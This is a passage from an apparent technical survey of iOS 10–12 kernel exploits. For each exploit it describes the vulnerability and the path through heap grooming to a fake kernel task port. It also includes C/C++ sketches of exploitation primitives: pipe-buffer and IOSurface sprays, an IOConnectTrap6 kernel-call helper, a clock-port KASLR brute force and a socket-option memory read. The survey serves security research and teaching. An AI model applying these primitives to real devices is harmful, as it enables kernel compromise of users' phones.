Subsequent exploit flow: The hijacked virtual method call is used with the OSSerializer::serialize() gadget to call copyin() and overwrite 2 sysctl_oid structs. The sysctls are overwritten such that reading the first sysctl calls copyin() to update the function pointer and arguments for the second sysctl and reading the second sysctl uses the OSSerializer::serialize() gadget to call the kernel function with 3 arguments. This 3-argument arbitrary kernel function call primitive is used to read and write arbitrary memory by calling copyin()/copyout().

Notes: iOS 10.3 introduced the initial form of task_conversion_eval(), a weak mitigation that blocks userspace from accessing a right to the real kernel task port. Any exploit after iOS 10.3 needs to build a fake kernel task port instead.

async_wake - iOS 11.1.2

By Ian Beer.

The vulnerability: CVE-2017-13861 is a vulnerability in IOSurfaceRootUserClient::s_set_surface_notify() that causes an extra reference to be dropped on a Mach port. CVE-2017-13865 is a vulnerability in XNU's proc_list_uptrs() that leaks kernel pointers by failing to fully initialize heap memory before copying out the contents to userspace.

Exploit strategy: The information leak is used to discover the address of arbitrary Mach ports. A page of ports is allocated and a specific port from that page is selected based on its address. The port is deallocated using the IOSurfaceRootUserClient bug, yielding a receive right to a dangling Mach port at a known (and partially controlled) address.

Subsequent exploit flow: The other ports on that page are freed and a zone garbage collection is forced so that the page is reallocated with the contents of an ipc_kmsg, giving a fake Mach port with controlled contents at a known address. The reallocation converted the port into a fake task port through which arbitrary kernel memory can be read using pid_for_task(). (The address to read is updated without reallocating the fake port by using mach_port_set_context().) Relevant kernel objects are located using the kernel read primitive and the fake port is reallocated again with a fake kernel task port.

Notes: iOS 11 removed the mach_zone_force_gc() function which allowed userspace to prompt the kernel to perform a zone garbage collection, reclaiming all-free virtual pages in the zone map for use by other zones. Exploits for iOS 11 and later needed to develop a technique to force a zone garbage collection. At least three independent techniques have been developed to do so, demonstrated in async_wake, v0rtex, and In-the-wild iOS exploit chain 3.

In-the-wild iOS Exploit Chain 2 - iOS 10.3.3

Discovered in-the-wild by Clément Lecigne. Analyzed by Ian Beer and Samuel Groß.

The vulnerability: CVE-2017-13861 (same as above).

Exploit strategy: Two Mach ports, port A and port B, are allocated as part of a spray. The vulnerability is triggered to drop a reference on port A, and the ports surrounding A are freed, leading to a dangling port pointer. Zone garbage collection is forced by calling mach_zone_force_gc() and the page containing port A is reallocated with an OOL ports spray containing a pattern such that port A's ip_context field overlaps a pointer to port B. Calling mach_port_get_context() gives the address of port B. The vulnerability is triggered again with port B, leading to a receive right to a dangling Mach port at a known address.

Subsequent exploit flow: After another zone garbage collection, the dangling port B is reallocated with a segmented OOL memory spray such that calling mach_port_get_context() can identify which 4 MB segment of the spray reallocated port B. That segment is freed and port B is reallocated with pipe buffers, giving a controlled fake Mach port at a known address. The fake port is converted into a clock port and clock_sleep_trap() is used to brute force KASLR. The fake port is next converted into a fake task port and a 4-byte kernel read primitive is established using pid_for_task(). Finally, the fake port is converted into a fake kernel task port.

v0rtex - iOS 10.3.3

By Siguza (@S1guza).

The vulnerability: CVE-2017-13861 (same as above).

Exploit strategy: Mach ports are sprayed and a reference on one port is dropped using the vulnerability. The other ports on the page are freed, leaving a receive right to a dangling Mach port.

Subsequent exploit flow: A zone garbage collection is forced using mach_zone_force_gc() and the page containing the dangling port is reallocated with an OSString buffer via an IOSurface property spray. The OSString buffer contains a pattern that initializes critical fields of the port and allows the index of the OSString containing the port to be determined by calling mach_port_get_context() on the fake port. The OSString containing the fake port is freed and reallocated as a normal Mach port. mach_port_request_notification() is called to put the address of a real Mach port in the fake port's ip_pdrequest field, and the OSString's contents are read via IOSurface to get the address. mach_port_request_notification() is used again to get the address of the fake port itself.

The string buffer is freed and reallocated such that mach_port_get_attributes() can be used as a 4-byte arbitrary read primitive, with the target address to read updateable via mach_port_set_context(). (This is analogous to the pid_for_task() technique, but with slightly different constraints.) Starting at the address of the real Mach port, kernel memory is read to find relevant kernel objects. The string buffer is freed and reallocated again with a fake task port sufficient to remap the string buffer into the process's address space. The fake port is updated via the mapping to yield a 7-argument arbitrary kernel function call primitive using iokit_user_client_trap(), and kernel functions are called to generate a fake kernel task port.

Incomplete exploit for CVE-2018-4150 bpf-filter-poc - iOS 11.2.6

Vulnerability analysis and POC by Chris Wade (@cmwdotme) at Corellium. Exploit by littlelailo (@littlelailo).

The vulnerability: CVE-2018-4150 is a race condition in XNU's BPF subsystem which leads to a linear heap buffer overflow due to a buffer length being increased without reallocating the corresponding buffer.

Exploit strategy: The race is triggered to incorrectly increase the length of the buffer without reallocating the buffer itself. A packet is sent and stored in the buffer, overflowing into a subsequent OOL ports array and inserting a pointer to a fake Mach port in userspace. Receiving the message containing the OOL ports yields a send right to the fake Mach port whose contents can be controlled directly.

Subsequent exploit flow: The fake Mach port is converted into a clock port and clock_sleep_trap() is used to brute force a kernel image pointer. Then the port is converted into a fake task port to read memory via pid_for_task(). Kernel memory is scanned backwards from the leaked kernel image pointer until the kernel text base is located, breaking KASLR. The final part of the exploit is incomplete, but construction of a fake kernel task port at this stage would be straightforward and deterministic using existing code.

Notes: The exploit does not work with PAN enabled.

multi_path - iOS 11.3.1

By Ian Beer.

The vulnerability: CVE-2018-4241 is an intra-object linear heap buffer overflow in XNU's mptcp_usr_connectx() due to incorrect bounds checking.

Exploit strategy: The kernel heap is groomed to place a 2048-byte ipc_kmsg struct at a 16 MB aligned address below the mptses structs (the object containing the overflow) associated with a few multipath TCP sockets. The vulnerability is used to overwrite the lower 3 bytes of the mpte_itfinfo pointer in the mptses struct with zeros and the socket is closed. This triggers a kfree() of the corrupted pointer, freeing the ipc_kmsg struct at the 16 MB alignment boundary. The freed ipc_kmsg slot is reallocated with sprayed pipe buffers. The vulnerability is triggered again to overwrite the lower 3 bytes of the mpte_itfinfo pointer in another mptses struct with zeros and the socket is closed, causing another kfree() of the same address. This frees the pipe buffer that was just allocated into that slot, leaving a dangling pipe buffer.

Subsequent exploit flow: The slot is reallocated again with a preallocated ipc_kmsg. A userspace thread is crashed to cause a message to be stored in the preallocated ipc_kmsg buffer overlapping the pipe buffer; reading the pipe in userspace yields the contents of the ipc_kmsg struct, giving the address of the dangling pipe buffer/ipc_kmsg. The pipe is written to change the contents of the ipc_kmsg struct such that receiving the message yields a send right to a fake Mach port inside the pipe buffer. The exception message is received and the pipe is rewritten to convert the fake port into a kernel read primitive using pid_for_task(). Relevant kernel objects are located and the fake port is converted into a fake kernel task port.
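
The pipe buffer primitive used here (and in several later entries) has a simple userspace shape: writing to a pipe backs the data with a kalloc'd kernel buffer whose contents can later be drained and rewritten without the allocation moving. A hedged sketch, assuming the chosen size maps onto the kalloc zone the exploit cares about:

#include <unistd.h>
#include <string.h>

struct kernel_pipe_buffer {
    int rfd;
    int wfd;
    size_t size;
};

// Allocate a kernel pipe buffer of roughly `size` bytes filled with `data`.
static bool pipe_buffer_alloc(kernel_pipe_buffer *kb, const void *data, size_t size) {
    int fds[2];
    if (pipe(fds) != 0)
        return false;
    kb->rfd = fds[0];
    kb->wfd = fds[1];
    kb->size = size;
    return write(kb->wfd, data, size) == (ssize_t)size;
}

// Replace the buffer's contents in place: drain the old data, then write new
// data of the same size, which reuses the same kernel allocation. Closing
// both file descriptors later frees the buffer.
static bool pipe_buffer_rewrite(kernel_pipe_buffer *kb, const void *data) {
    char drain[0x1000];
    size_t left = kb->size;
    while (left > 0) {
        size_t chunk = left < sizeof(drain) ? left : sizeof(drain);
        ssize_t n = read(kb->rfd, drain, chunk);
        if (n <= 0)
            return false;
        left -= (size_t)n;
    }
    return write(kb->wfd, data, kb->size) == (ssize_t)kb->size;
}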

multipath_kfree - iOS 11.3.1

By John Åkerblom (@jaakerblom).

The vulnerability: CVE-2018-4241 (same as above).

Exploit strategy: The kernel heap is groomed to place preallocated 4096-byte ipc_kmsg structs near the mptses structs for a few multipath TCP sockets. The vulnerability is triggered twice to corrupt the lower 2 bytes of the mpte_itfinfo pointer in two mptses structs, such that closing the sockets results in kfree()s of the two corrupted pointers. Each pointer is corrupted to point 0x7a0 bytes into an ipc_kmsg allocation, creating 4096-byte holes spanning 2 messages. A Mach port containing one of the partially-freed ipc_kmsg structs (with the ipc_kmsg header intact but the message contents freed) is located by using mach_port_peek() to detect a corrupted msgh_id field. Once the port is found, the hole is reallocated by spraying preallocated ipc_kmsg structs and a message is placed in each. Filling the hole overlaps the original (partially freed) ipc_kmsg's Mach message contents with the ipc_kmsg header of the replacement, such that receiving the message on the original port reads the contents of the replacement ipc_kmsg header. The header contains a pointer to itself, disclosing the address of the replacement ipc_kmsg allocation. The vulnerability is triggered a third time to free the replacement message, leaving a partially freed preallocated ipc_kmsg at a known address.

Subsequent exploit flow: The hole in the corrupted ipc_kmsg is reallocated by spraying AGXCommandQueue user clients. A message is received on the Mach port in userspace, copying out the contents of the AGXCommandQueue object, from which the vtable is used to determine the KASLR slide. Then the corrupted ipc_kmsg is freed and reallocated by spraying more preallocated ipc_kmsg structs with a slightly different internal layout allowing more control over the contents. A message is placed in each of the just-sprayed ipc_kmsg structs to modify the overlapping AGXCommandQueue and hijack a virtual method call; the hijacked virtual method uses the OSSerializer::serialize() gadget to call copyout(), which is used to identify which of the sprayed AGXCommandQueue user clients overlaps the slot from the corrupted ipc_kmsg. The contents of each of the just-sprayed preallocated ipc_kmsg structs is updated in turn to identify which port corresponds to the corrupted ipc_kmsg. The preallocated port and user client port are used together to build a 3-argument arbitrary kernel function call primitive by updating the contents of the AGXCommandQueue object through an exception message sent to the preallocated port.

empty_list - iOS 11.3.1

By Ian Beer.

The vulnerability: CVE-2018-4243 is a partially controlled 8-byte heap out-of-bounds write in XNU's getvolattrlist() due to incorrect bounds checking.

Exploit strategy: Due to significant triggering constraints, the vulnerability is treated as an 8-byte heap out-of-bounds write of zeros off the end of a kalloc.16 allocation. The kernel heap is groomed into a pattern of alternating blocks for the zones of kalloc.16 and ipc.ports, and further grooming reverses the kalloc.16 freelist. The vulnerability is repeatedly triggered after freeing various kalloc.16 allocations until a kalloc.16 allocation at the end of a block is overflowed, corrupting the first 8 bytes of the first ipc_port on the subsequent page. The corrupted port is freed by calling mach_port_set_attributes(), leaving the process holding a receive right to a dangling Mach port.

Subsequent exploit flow: A zone garbage collection is forced and the dangling port is reallocated with an OOL ports array containing a pointer to another Mach port overlapping the ip_context field, so that the address of the other port is retrieved by calling mach_port_get_context(). The dangling port is then reallocated with pipe buffers and converted into a kernel read primitive using pid_for_task(). Using the address of the other port as a starting point, relevant kernel objects are located. Finally, the fake port is converted into a fake kernel task port.

In-the-wild iOS Exploit Chain 3 - iOS 11.4

Discovered in-the-wild by Clément Lecigne. Analyzed by Ian Beer and Samuel Groß.

The vulnerability: The vulnerability is a double-free reachable from AppleVXD393UserClient::DestroyDecoder() (the class name varies by hardware) due to failing to clear a freed pointer.

Exploit strategy: The target 56-byte allocation is created and freed, leaving the dangling pointer intact. The slot is reallocated with an OSData buffer using an IOSurface property spray. The vulnerable method is called again to free the buffer, leaving a dangling OSData buffer. The slot is reallocated again with an OOL ports array containing a single target Mach port pointer and the contents are read in userspace via IOSurface properties, yielding the address of the port. The vulnerable method is called once more to free the OOL ports and the slot is reallocated with another OSData buffer containing two pointers to the Mach port. The port holding the OOL descriptor is destroyed, dropping two references to the Mach port. This leaves the process with a receive right to a dangling Mach port at a known address.

Subsequent exploit flow: A zone garbage collection is performed and the dangling port is reallocated with a segmented OOL memory spray such that calling mach_port_get_context() can identify which segment of the spray reallocated the port. That segment is freed and the dangling port is reallocated with pipe buffers, giving a controlled fake Mach port at a known address. The fake port is converted into a clock port and clock_sleep_trap() is used to brute force KASLR. The fake port is next converted into a fake task port and a kernel read primitive is established using pid_for_task(). Finally, the fake port is converted into a fake kernel task port.

Spice - iOS 11.4.1

Vulnerability analysis and POC by Luca Moro (@JohnCool__) at Synacktiv. Exploit by Siguza, Viktor Oreshkin (@stek29), Ben Sparkes (@iBSparkes), and littlelailo.

The vulnerability: The "LightSpeed" vulnerability (possibly CVE-2018-4344) is a race condition in XNU's lio_listio() due to improper state management that results in a use-after-free.

Exploit strategy: The vulnerable function is called in a loop in one thread to repeatedly trigger the vulnerability by allocating a buffer from kalloc.16 and racing to free the buffer twice. Another thread repeatedly sends a message containing an OOL ports array allocated from kalloc.16, immediately sprays a large number of kalloc.16 allocations containing a pointer to a fake Mach port in userspace via IOSurface properties, and receives the OOL ports. When the race is won, the double-free can cause the OOL ports array to be freed, and the subsequent spray can reallocate the slot with a fake OOL ports array. Receiving the OOL ports in userspace gives a receive right to a fake Mach port whose contents can be controlled directly.

Subsequent exploit flow: A second Mach port is registered as a notification port on the fake port, disclosing the address of the second port in the fake port's ip_pdrequest field. The fake port is modified to construct a kernel read primitive using mach_port_get_attributes(). Starting from the disclosed port pointer, kernel memory is read to find relevant kernel objects. The fake port is converted into a fake user client port providing a 7-argument arbitrary kernel function call primitive using iokit_user_client_trap(). Finally, a fake kernel task port is constructed.
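
The iokit_user_client_trap() primitive mentioned here (and in the next entry) is reached from userspace through IOConnectTrap6(). The sketch below shows only the calling side; the helper that rewrites the fake IOExternalTrap is a hypothetical stand-in for whatever memory-rewrite primitive the exploit already has (here, direct writes to the userspace-backed fake port page).

#include <IOKit/IOKitLib.h>
#include <stdint.h>

// Hypothetical helper: rewrite the fake IOExternalTrap so that
// trap->object == first_arg and trap->func == func.
void set_fake_trap(uint64_t func, uint64_t first_arg);

// Sketch of the 7-argument kernel call: iokit_user_client_trap() ends up
// invoking func(first_arg, arg1, ..., arg6) in the kernel, so together with
// the trap's object pointer the attacker controls seven arguments.
static uint32_t kernel_call_7(mach_port_t fake_user_client, uint64_t func,
                              uint64_t first_arg, uint64_t arg1, uint64_t arg2,
                              uint64_t arg3, uint64_t arg4, uint64_t arg5,
                              uint64_t arg6) {
    set_fake_trap(func, first_arg);
    return (uint32_t)IOConnectTrap6(fake_user_client, 0, arg1, arg2, arg3,
                                    arg4, arg5, arg6);
}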

Notes: The exploit does not work with PAN enabled.

The analysis was performed on the implementation in the file pwn.m, since this seems to provide the most direct comparison to the other exploit implementations in this list.

treadm1ll - iOS 11.4.1

Vulnerability analysis and POC by Luca Moro. Exploit by Tihmstar (@tihmstar).

The vulnerability: The "LightSpeed" vulnerability (same as above).

Exploit strategy: The vulnerable function is called in a loop in one thread to repeatedly trigger the vulnerability by allocating a buffer from kalloc.16 and racing to free the buffer twice. Another thread sends a fixed number of messages containing an OOL ports array allocated from kalloc.16. When the race is won, the double-free can cause the OOL ports array to be freed, leaving a dangling OOL ports array pointer in some messages. The first thread stops triggering the vulnerability and a large number of IOSurface objects are created. Each message is received in turn and a large number of kalloc.16 allocations containing a pointer to a fake Mach port in userspace are sprayed using IOSurface properties. Each spray can reallocate a slot from a dangling OOL ports array with a fake OOL ports array. Successfully receiving the OOL ports in userspace gives a receive right to a fake Mach port whose contents can be controlled directly.

Subsequent exploit flow: A second Mach port is registered as a notification port on the fake port, disclosing the address of the second port in the fake port's ip_pdrequest field. The fake port is modified to construct a kernel read primitive using pid_for_task(). Starting from the disclosed port pointer, kernel memory is read to find relevant kernel objects. The fake port is converted into a fake user client port providing a 7-argument arbitrary kernel function call primitive using iokit_user_client_trap(). Finally, a fake kernel task port is constructed.

Notes: The exploit does not work with PAN enabled.

Chaos - iOS 12.1.2

By Qixun Zhao (@S0rryMybad) of Qihoo 360 Vulcan Team.

The vulnerability: CVE-2019-6225 is a use-after-free due to XNU's task_swap_mach_voucher() failing to comply with MIG lifetime semantics that results in an extra reference being added or dropped on an ipc_voucher object.

Exploit strategy: A large number of ipc_voucher objects are sprayed and the vulnerability is triggered twice to decrease the reference count on a voucher and free it. The remaining vouchers on the page are freed and a zone garbage collection is forced, leaving a dangling ipc_voucher pointer in the thread's ith_voucher field.

Subsequent exploit flow: The dangling voucher is reallocated by an OSString buffer using an IOSurface property spray. thread_get_mach_voucher() is called to obtain a send right to a newly allocated voucher port for the voucher, which causes a pointer to the voucher port to be stored in the fake voucher overlapping the OSString buffer; reading the OSString property discloses the address of the voucher port. The OSString overlapping the fake voucher is freed and reallocated with a large spray that both forces the allocation of controlled data containing a fake Mach port at a hardcoded address and updates the fake voucher's iv_port pointer to point to the fake Mach port. thread_get_mach_voucher() is called again to obtain a send right to the fake port and to identify which OSString buffer contains the fake Mach port. This leaves the process with a send right to a fake Mach port in an IOSurface property buffer at a known address (roughly equivalent to a dangling Mach port). A kernel read primitive is built by reallocating the OSString buffer to convert the fake port into a fake task port and calling pid_for_task() to read arbitrary memory. Relevant kernel objects are located and the fake port is converted into a fake map port to remap the fake port into userspace, removing the need to reallocate it. Finally the fake port is converted into a fake kernel task port.
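
The IOSurface property sprays used throughout this entry (and many others) boil down to attaching controlled CF objects as properties on an IOSurface, so that the kernel deserializes them into OSData/OSString allocations with chosen contents that can later be read back or freed on demand. The sketch below uses the IOSurface.framework property functions for brevity; treat those calls as an assumption, since the exploits themselves typically invoke the IOSurfaceRootUserClient external methods directly.

#include <IOSurface/IOSurfaceRef.h>
#include <CoreFoundation/CoreFoundation.h>

// Create a minimal 1x1 surface to hang the sprayed properties off.
static IOSurfaceRef create_spray_surface(void) {
    int32_t dim = 1, bpe = 4;
    const void *keys[] = { kIOSurfaceWidth, kIOSurfaceHeight, kIOSurfaceBytesPerElement };
    const void *vals[] = {
        CFNumberCreate(NULL, kCFNumberSInt32Type, &dim),
        CFNumberCreate(NULL, kCFNumberSInt32Type, &dim),
        CFNumberCreate(NULL, kCFNumberSInt32Type, &bpe),
    };
    CFDictionaryRef props = CFDictionaryCreate(NULL, keys, vals, 3,
                                               &kCFTypeDictionaryKeyCallBacks,
                                               &kCFTypeDictionaryValueCallBacks);
    IOSurfaceRef surface = IOSurfaceCreate(props);
    CFRelease(props);
    for (int i = 0; i < 3; i++) CFRelease((CFTypeRef)vals[i]);
    return surface;
}

// Spray `count` kernel OSData buffers of `size` bytes containing `data`.
// Each property can later be read back (to detect what reallocated a freed
// slot) or removed (to free the buffer at a chosen time).
static void spray_osdata(IOSurfaceRef surface, const void *data, size_t size,
                         size_t count) {
    CFDataRef value = CFDataCreate(NULL, (const UInt8 *)data, (CFIndex)size);
    for (size_t i = 0; i < count; i++) {
        CFStringRef key = CFStringCreateWithFormat(NULL, NULL, CFSTR("spray_%lu"),
                                                   (unsigned long)i);
        IOSurfaceSetValue(surface, key, value);
        CFRelease(key);
    }
    CFRelease(value);
}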

Notes: The A12 introduced PAC, which limits the ability to use certain exploitation techniques involving code pointers (e.g. vtable hijacking). Also, iOS 12 introduced a mitigation in ipc_port_finalize() against freeing a port while it is still active (i.e. hasn't been destroyed, for example because a process still holds a right to it). This changed the common structure of past exploits whereby a port would be freed while a process still held a right to it. Possibly as a result, obtaining a right to a fake port in iOS 12+ exploits seems to occur later in the flow than in earlier exploits.

voucher_swap - iOS 12.1.2

By Brandon Azad (@_bazad) of Google Project Zero.

The vulnerability: CVE-2019-6225 (same as above).

Exploit strategy: The kernel heap is groomed to put a block of ipc_port allocations directly before a block of pipe buffers. A large number of ipc_voucher objects are sprayed and the vulnerability is triggered to decrease the reference count on a voucher and free it. The remaining vouchers on the page are freed and a zone garbage collection is forced, leaving a dangling ipc_voucher pointer in the thread's ith_voucher field.

Subsequent exploit flow: The dangling voucher is reallocated with an OOL ports array containing a pointer to a previously-allocated ipc_port overlapping the voucher's iv_refs field. A send right to the voucher port is retrieved by calling thread_get_mach_voucher() and the voucher's reference count is increased by repeatedly calling the vulnerable function, updating the overlapping ipc_port pointer to point into the pipe buffers. Receiving the OOL ports yields a send right to a fake Mach port whose contents can be controlled directly. mach_port_request_notification() is called to insert a pointer to an array containing a pointer to another Mach port in the fake port's ip_requests field. A kernel read primitive is built using pid_for_task(), and the address of the other Mach port is read to compute the address of the fake port. Relevant kernel objects are located and a fake kernel task port is constructed.

machswap2 - iOS 12.1.2

By Ben Sparkes.

The vulnerability: CVE-2019-6225 (same as above).

Exploit strategy: A large number of ipc_voucher objects are sprayed and the vulnerability is triggered twice to decrease the reference count on a voucher and free it. The remaining vouchers on the page are freed and a zone garbage collection is forced, leaving a dangling ipc_voucher pointer in the thread's ith_voucher field.

Subsequent exploit flow: The dangling voucher is reallocated by an OSString buffer containing a fake voucher using an IOSurface property spray. thread_get_mach_voucher() is called to obtain a send right to a newly allocated voucher port for the voucher, which causes a pointer to the voucher port to be stored in the fake voucher overlapping the OSString buffer; reading the OSString property discloses the address of the voucher port. Pipe buffers containing fake task ports are sprayed to land roughly 1 MB after the disclosed port address. The OSString overlapping the fake voucher is freed and reallocated to update the fake voucher's iv_port pointer to point into the pipe buffers. thread_get_mach_voucher() is called again to retrieve the updated voucher port, yielding a send right to a fake Mach port at a known address whose contents can be controlled directly. The fake port is converted into a fake task port and a kernel read primitive is established using pid_for_task(). Relevant kernel objects are located and a fake kernel task port is constructed.

Notes: The author developed two versions of this exploit: one for pre-PAN devices, and one for PAN-enabled devices. The exploit presented here is for PAN-enabled devices.

In-the-wild iOS Exploit Chain 5 - iOS 12.1.2

Discovered in-the-wild by Clément Lecigne. Analyzed by Ian Beer and Samuel Groß.

The vulnerability: CVE-2019-6225 (same as above).

Exploit strategy: A large number of ipc_voucher objects are sprayed and the vulnerability is triggered to decrease the reference count on a voucher and free it. The remaining vouchers on the page are freed and a zone garbage collection is forced, leaving a dangling ipc_voucher pointer in the thread's ith_voucher field.

Subsequent exploit flow: The dangling voucher is reallocated by an OOL memory spray. A large number of Mach ports are allocated and then thread_get_mach_voucher() is called to obtain a send right to a newly allocated voucher port for the voucher, which causes a pointer to the voucher port to be stored in the fake voucher overlapping the OOL ports array. More ports are allocated and then the OOL memory spray is received, disclosing the address of the voucher port for the fake voucher. The dangling voucher is reallocated again with another OOL memory spray that updates the voucher's iv_port pointer to the subsequent page. The Mach ports are destroyed and a zone garbage collection is forced, leaving the fake voucher holding a pointer to a dangling port. The dangling port is reallocated with pipe buffers. Finally, thread_get_mach_voucher() is called, yielding a send right to a fake Mach port at a known address whose contents can be controlled directly. The fake port is converted into a fake task port and a kernel read primitive is established using pid_for_task(). Relevant kernel objects are located and the fake port is converted into a fake kernel task port.

In-the-wild iOS Exploit Chain 4 - iOS 12.1.3

Discovered in-the-wild by Clément Lecigne. Analyzed by Ian Beer and Samuel Groß. Also reported by an anonymous researcher.

The vulnerability: CVE-2019-7287 is a linear heap buffer overflow in the IOKit function ProvInfoIOKitUserClient::ucEncryptSUInfo() due to an unchecked memcpy().

Exploit strategy: The kernel heap is groomed to place holes in kalloc.4096 before an OOL ports array and holes in kalloc.6144 before an OSData buffer accessible via IOSurface properties. The vulnerability is triggered with the source allocated from kalloc.4096 and the destination allocated from kalloc.6144, causing the address of a target Mach port to be copied into the OSData buffer. The OSData buffer is then read, disclosing the address of the target port. The heap is groomed again to place holes in kalloc.4096 before an OOL memory buffer and in kalloc.6144 before an OOL ports array. The vulnerability is triggered again to insert a pointer to the target port into the OOL ports array. The target port is freed and a zone garbage collection is forced, leaving a dangling port pointer in the OOL ports array. The dangling port is reallocated with pipe buffers and the OOL ports are received, giving a receive right to a fake Mach port at a known address whose contents can be controlled directly.

Subsequent exploit flow: The fake port is converted into a fake clock port and clock_sleep_trap() is used to brute force KASLR. The fake port is converted into a fake task port and a kernel read primitive is established using pid_for_task(). Relevant kernel objects are located and the fake port is converted into a fake kernel task port.
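
The clock-port brute force used here also appears in earlier entries (bpf-filter-poc, In-the-wild iOS Exploit Chain 3), so a short sketch of its shape follows. The helper that retypes the fake port as a clock and points its kobject at a candidate address is a hypothetical stand-in for the exploit's pipe-buffer rewrite, and the trap declaration is the one commonly used by public exploit code.

#include <mach/mach.h>
#include <mach/clock_types.h>
#include <stdint.h>

extern "C" kern_return_t clock_sleep_trap(mach_port_name_t clock_name,
                                          int sleep_type, int sleep_sec,
                                          int sleep_nsec,
                                          mach_timespec_t *wakeup_time);

// Hypothetical helper: rewrite the fake port so io_bits marks it as a clock
// port and ip_kobject points at `candidate`.
void set_fake_clock_kobject(uint64_t candidate);

// clock_sleep_trap() only returns KERN_SUCCESS when the port's kobject is a
// real clock object, so walking candidate addresses reveals the address of a
// clock in the kernelcache and hence the KASLR slide.
static uint64_t brute_force_clock(mach_port_t fake_port, uint64_t start,
                                  uint64_t end, uint64_t step) {
    for (uint64_t candidate = start; candidate < end; candidate += step) {
        set_fake_clock_kobject(candidate);
        if (clock_sleep_trap(fake_port, TIME_ABSOLUTE, 0, 0, NULL) == KERN_SUCCESS)
            return candidate;
    }
    return 0;
}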

Attacking iPhone XS Max - iOS 12.1.4

By Tielei Wang (@wangtielei) and Hao Xu (@windknown).

The vulnerability: The vulnerability is a race condition in XNU's UNIX domain socket bind implementation due to the temporary unlock antipattern that results in a use-after-free.

Exploit strategy: Sockets are sprayed and the vulnerability is triggered to leave a dangling socket pointer in a vnode struct. The sockets are closed, a zone garbage collection is forced, and the sockets are reallocated with controlled data via an OSData spray (possibly an IOSurface property spray). The fake socket is constructed to have a reference count of 0. The use-after-free is triggered to call socket_unlock() on the fake socket, which causes the fake socket/OSData buffer to be freed using kfree(). This leaves a dangling OSData buffer accessible using unspecified means.

Subsequent exploit flow: The dangling OSData buffer is reallocated with an OOL ports array and the OSData buffer is freed, leaving a dangling OOL ports array. Kernel memory is sprayed to place a fake Mach port at a hardcoded address (or an information leak is used) and the OOL ports array is reallocated with another OSData buffer, inserting a pointer to the fake Mach port into the OOL ports array. The OOL ports are received, yielding a send or receive right to the fake Mach port at a known address. The fake port is converted into a fake kernel task port by unspecified means.

Notes: The only reference for this exploit is a BlackHat presentation, hence the uncertainties in the explanations above.

The authors developed two versions of this exploit: one for non-PAC devices, and one for PAC-enabled devices. The exploit presented here is for PAC-enabled devices. The non-PAC exploit is substantially simpler (hijacking a function pointer used by socket_lock()).

SockPuppet - iOS 12.2 and iOS 12.4

By Ned Williamson (@nedwilliamson) working with Google Project Zero.

The vulnerability: CVE-2019-8605 is a use-after-free due to XNU's in6_pcbdetach() failing to clear a freed pointer.

Exploit strategy: Safe arbitrary read, arbitrary kfree(), and arbitrary Mach port address disclosure primitives are constructed over the vulnerability.

The arbitrary read primitive: The vulnerability is triggered multiple times to create a number of dangling ip6_pktopts structs associated with sockets. The dangling ip6_pktopts are reallocated with an OSData buffer spray via IOSurface properties such that ip6po_minmtu is set to a known value and ip6po_pktinfo is set to the address to read. The ip6po_minmtu field is checked via getsockopt(), and if correct, getsockopt(IPV6_PKTINFO) is called to read 20 bytes of data from the address pointed to by ip6po_pktinfo.

The arbitrary kfree() primitive: The vulnerability is triggered multiple times to create a number of dangling ip6_pktopts structs associated with sockets. The dangling ip6_pktopts are reallocated with an OSData buffer spray via IOSurface properties such that ip6po_minmtu is set to a known value and ip6po_pktinfo is set to the address to free. The ip6po_minmtu field is checked via getsockopt(), and if correct, setsockopt(IPV6_PKTINFO) is called to invoke kfree_addr() on the ip6po_pktinfo pointer.

The arbitrary Mach port address disclosure primitive: The vulnerability is triggered multiple times to create a number of dangling ip6_pktopts structs associated with sockets. The dangling ip6_pktopts are reallocated with an OOL ports array spray containing pointers to the target port. The ip6po_minmtu and ip6po_prefer_tempaddr fields are read via getsockopt(), disclosing the value of the target port pointer. The port is checked to be of the expected type using the arbitrary read primitive.
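
A sketch of what the read primitive described above looks like from userspace is shown below. The marker value, and the assumption that the reallocation spray fully controls ip6po_minmtu and ip6po_pktinfo, are placeholders for the actual IOSurface-based reallocation step.

#define __APPLE_USE_RFC_3542 1
#include <netinet/in.h>
#include <sys/socket.h>
#include <string.h>

// Illustrative marker written into ip6po_minmtu by the reallocation spray.
static const int MAGIC_MINMTU = 0x1234;

// Hedged sketch (not the exploit's own code) of the safe 20-byte read:
// `sock` is a socket whose freed ip6_pktopts has been reallocated with
// controlled data pointing ip6po_pktinfo at the address to read.
static bool try_read_20_bytes(int sock, void *out /* 20 bytes */) {
    int minmtu = -1;
    socklen_t len = sizeof(minmtu);
    // First confirm that our spray actually won the reallocation race.
    if (getsockopt(sock, IPPROTO_IPV6, IPV6_USE_MIN_MTU, &minmtu, &len) != 0 ||
        minmtu != MAGIC_MINMTU)
        return false;
    // The kernel copies sizeof(struct in6_pktinfo) == 20 bytes back from the
    // address stored in ip6po_pktinfo.
    struct in6_pktinfo info;
    len = sizeof(info);
    if (getsockopt(sock, IPPROTO_IPV6, IPV6_PKTINFO, &info, &len) != 0)
        return false;
    memcpy(out, &info, sizeof(info));
    return true;
}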

Subsequent exploit flow: The Mach port address disclosure primitive is used to disclose the address of the current task. Two pipes are created and the addresses of the pipe buffers in the kernel are found using the kernel read primitive. Relevant kernel objects are located and a fake kernel task port is constructed in one of the pipe buffers. The arbitrary kfree() primitive is used to free the pipe buffer for the other pipe, and the pipe buffer is reallocated by spraying OOL ports arrays. The pipe is then written to insert a pointer to the fake kernel task port into the OOL ports array, and the OOL ports are received, yielding a fake kernel task port.

Notes: Unlike most other exploits on this list which are structured linearly, SockPuppet is structured hierarchically, building on the same primitives throughout. This distinct structure is likely due to the power and stability of the underlying vulnerability: the bug directly provides both an arbitrary read and an arbitrary free primitive, and in practice both primitives are 100% safe and reliable because it is possible to check that the reallocation is successful. However, this structure means that there is no clear temporal boundary in the high-level exploit flow between the vulnerability-specific and generic exploitation. Instead, that boundary occurs between conceptual layers in the exploit code.

The SockPuppet bug was fixed in iOS 12.3 but reintroduced in iOS 12.4.

AppleAVE2Driver exploit - iOS 12.4.1

By 08Tc3wBB (@08Tc3wBB).

The vulnerability: CVE-2019-8795 is a memory corruption in AppleAVE2Driver whereby improper bounds checking leads to processing of out-of-bounds data, eventually resulting in a controlled virtual method call or arbitrary kfree(). CVE-2019-8794 is a kernel memory disclosure in AppleSPUProfileDriver due to uninitialized stack data being shared with userspace.

Exploit strategy: The KASLR slide is discovered using the AppleSPUProfileDriver vulnerability. OSData buffers containing fake task ports are sprayed using IOSurface properties. The vulnerability is triggered to free an OSData buffer at a hardcoded address, leaving a dangling OSData buffer accessible via IOSurface properties.

